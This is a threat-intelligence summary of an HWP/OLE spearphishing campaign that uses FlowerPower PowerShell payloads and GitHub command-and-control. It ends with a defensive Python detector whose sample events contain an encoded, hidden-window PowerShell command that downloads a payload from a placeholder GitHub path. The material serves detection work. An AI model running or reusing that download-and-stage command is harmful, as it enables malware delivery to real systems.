Keypoints
- Attackers deliver malicious OLE objects embedded within Hancom HWP documents to Korean targets.
- Initial lure is a forged interview request from a foreign news channel, crafted to induce the target to open the HWP file.
- Embedded OLE triggers execution of encrypted PowerShell commands tied to the FlowerPower attack tool series.
- Adversaries use GitHub as a code-hosting platform for command-and-control, leveraging it for versioning and remote commands.
- Observed payload filenames include flower01.ps1 and bobo.ps1; actor identifiers such as ‘flower9801’ were linked to past activity.
- The toolset is associated with aliases like BoBoStealer, FakeStriker, Jinho Spy, and GoldDragon in prior reports.
- Genians recommends visibility and early detection via Genian EDR to reduce impact and accelerate response.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The campaign uses a malicious HWP document delivered as a targeted interview request to induce a user to open the file (‘disguised as an interview request from a foreign news channel’).
- [T1204.002] User Execution: Malicious File – The attack relies on a crafted OLE object embedded in an HWP to execute when the document is opened (‘malicious “Object Linking and Embedding” (OLE) in HWP Korean documents’).
- [T1059.001] PowerShell – Embedded OLE results in execution of encrypted PowerShell commands that run the FlowerPower tool components (‘Execution of encrypted PowerShell commands using the FlowerPower APT attack tool series’).
- [T1027] Obfuscated Files or Information – PowerShell payloads and commands are encrypted/obfuscated to hinder analysis and detection (‘Execution of encrypted PowerShell commands’).
- [T1102] Web Service – The adversary uses GitHub as a hosting and command/control mechanism to store and deliver code or commands (‘Setting up the code hosting platform GitHub for version control and collaboration as a command center for threat commands’).
Indicators of Compromise
- [File names] Payload/script examples observed – flower01.ps1, bobo.ps1.
- [Malware/tool names] Identified tool family aliases – FlowerPower (aka BoBoStealer, FakeStriker, Jinho Spy, GoldDragon).
- [Document type] Delivery vector – HWP documents with embedded malicious OLE objects used to trigger payloads.
- [Accounts/IDs] Actor identifier referenced in prior activity – ‘flower9801’.
- [Service/Domain] Command-and-control platform – github.com used to host code and act as a C2 repository.
The technical procedure begins with a targeted lure: attackers craft Hancom HWP documents embedding malicious OLE objects that execute when a user opens the file. The malicious OLE is used to persist or drop components and to invoke a command interpreter; in observed cases this leads to running encrypted PowerShell commands that fetch or launch additional payloads.
The payloads are PowerShell-based and employ encryption/obfuscation to hinder detection; filenames recovered from analysis include flower01.ps1 and bobo.ps1, and these are linked to the FlowerPower tool family (also reported under names like BoBoStealer/FakeStriker). After execution, the malware uses legitimate web services—specifically GitHub—to host code and issue commands, leveraging repository/versioning features as a covert command-and-control mechanism.
For defenders, focus on detecting HWP files with embedded OLE objects, monitoring PowerShell process creation with encoded/obfuscated command lines, and tracking unexpected outbound requests to code-hosting services (e.g., GitHub) for anomalous repository or raw content access. Endpoint telemetry and an EDR solution that flags OLE execution, encoded PowerShell, and unusual accesses to web-hosted repositories can enable early detection and containment.
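A defender-side illustration of the detection points above, added here as example code and not taken from the Genians report: it decodes PowerShell -EncodedCommand arguments and flags the chain described in this summary (PowerShell spawned by Hwp.exe, an encoded command line, a fetch from GitHub) over a small set of constructed Sysmon-style events. Python is used rather than PowerShell so the logic runs anywhere; the Hancom install path, the repository path and every event are placeholders.

```python
import base64
import re

GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com", "gist.githubusercontent.com")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    for flag, blob in ENC_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ep (ExecutionPolicy) is a different switch
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None

def classify(ev):
    """Return detection reasons for one Sysmon-style event dict (empty when benign)."""
    reasons = []
    if not ev.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    if ev["EventID"] == 1:  # process creation
        if ev.get("ParentImage", "").lower().endswith("hwp.exe"):
            reasons.append("PowerShell spawned by Hancom HWP (embedded OLE execution)")
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if decoded is not None:
            reasons.append("encoded PowerShell command line")
            if any(h in decoded.lower() for h in GITHUB_HOSTS):
                reasons.append("decoded command fetches GitHub-hosted content")
    elif ev["EventID"] == 3:  # network connection
        if ev.get("DestinationHostname", "").lower() in GITHUB_HOSTS:
            reasons.append("PowerShell connecting to a GitHub host")
    return reasons

def triage(events):
    # One (EventID, Image, reasons) tuple per event that raised at least one reason.
    return [(ev["EventID"], ev["Image"], r) for ev in events if (r := classify(ev))]

def sample_events():
    """Constructed sample events, not telemetry from the report; the repo path is a placeholder."""
    fetch = "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/PLACEHOLDER/flower01.ps1' -OutFile $env:TEMP\\flower01.ps1"
    enc = base64.b64encode(fetch.encode("utf-16-le")).decode()
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {"EventID": 1, "Image": ps, "ParentImage": r"C:\HANCOM_PLACEHOLDER\Hwp.exe",
         "CommandLine": f"powershell.exe -nop -w hidden -enc {enc}"},
        {"EventID": 1, "Image": ps, "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": r"powershell.exe -ep bypass -File C:\scripts\backup.ps1"},
        {"EventID": 3, "Image": ps, "DestinationHostname": "raw.githubusercontent.com"},
    ]
```

The benign explorer.exe-launched script produces no reasons, so only the HWP-spawned encoded command and the PowerShell-to-GitHub connection surface from `triage`.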
Read more: https://www.genians.co.kr/blog/threat_intelligence/flowerpower